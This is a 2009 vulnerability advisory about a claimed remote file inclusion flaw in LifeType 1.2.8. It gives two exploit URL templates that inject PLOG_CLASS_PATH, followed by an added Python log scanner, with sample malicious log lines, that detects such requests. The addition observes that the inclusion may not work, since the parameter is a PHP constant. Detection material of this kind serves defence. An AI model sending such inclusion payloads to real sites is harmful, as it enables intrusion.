LifeType 1.2.8 Remote File Inclusion Vulnerability

2009-07-16T00:00:00
ID SECURITYVULNS:DOC:22169
Type securityvulns
Reporter Securityvulns
Modified 2009-07-16T00:00:00

Description

/===============================================================================================================================================\
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
|
| Software : LifeType 1.2.8 | Vendor : http://lifetype.net/ | Author : Cru3l.b0y
| Contact : Cru3l.b0y@deltahacking.net
| Home : WwW.DeltaHacking.Net

|===============================================================================================================================================|
| [o] Vulnerable file
|
| install/installation.class.php
|
| include_once( PLOG_CLASS_PATH."config/config.properties.php" );
|
| class/bootstrap.php
|
| include( PLOG_CLASS_PATH."class/object/loader.class.php" );
|
|
| [o] Exploit
|
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
|

|===============================================================================================================================================|
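
Detection logic for the two request shapes listed under "[o] Exploit", added here as an example and not part of the original advisory: it scans web access logs for requests to either script that carry a PLOG_CLASS_PATH parameter. The common/combined log format, the list of remote prefixes, the function names and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script paths and parameter name come from the advisory text.
TARGET_SCRIPTS = ("/install/installation.class.php", "/class/bootstrap.php")
PARAM = "PLOG_CLASS_PATH"
# Value prefixes that point an include path off-host (assumed watch list).
REMOTE_VALUE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:|//)", re.I)
# Client, request target and status from a common/combined log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client, script, value, severity) for a matching line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, _status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    script = next((s for s in TARGET_SCRIPTS if path.endswith(s)), None)
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if script is None or not values:
        return None
    # parse_qs decodes one layer; decode once more to catch double encoding.
    value = unquote(values[0])
    severity = "remote-path" if REMOTE_VALUE.match(value) else "param-set"
    return client, script, value, severity

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IPs and hostnames, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2009:10:00:01 +0000] "GET /blog/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Jul/2009:10:01:22 +0000] "GET /blog/class/bootstrap.php'
    '?PLOG_CLASS_PATH=http%3A%2F%2Ffiles.example.test%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Jul/2009:10:01:25 +0000] "GET /blog/install/installation.class.php'
    '?PLOG_CLASS_PATH=http%253A%252F%252Ffiles.example.test%252Fa.txt HTTP/1.0" 404 210',
    '203.0.113.5 - - [16/Jul/2009:10:02:40 +0000] "GET /blog/class/bootstrap.php'
    '?PLOG_CLASS_PATH=./ HTTP/1.1" 200 64',
    '192.0.2.10 - - [16/Jul/2009:10:03:00 +0000] "GET /blog/class/bootstrap.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit shows a request shaped like the advisory's URLs, not that inclusion succeeded: both include lines write PLOG_CLASS_PATH without a `$`, which PHP treats as a constant, and request parameters populate variables, not constants.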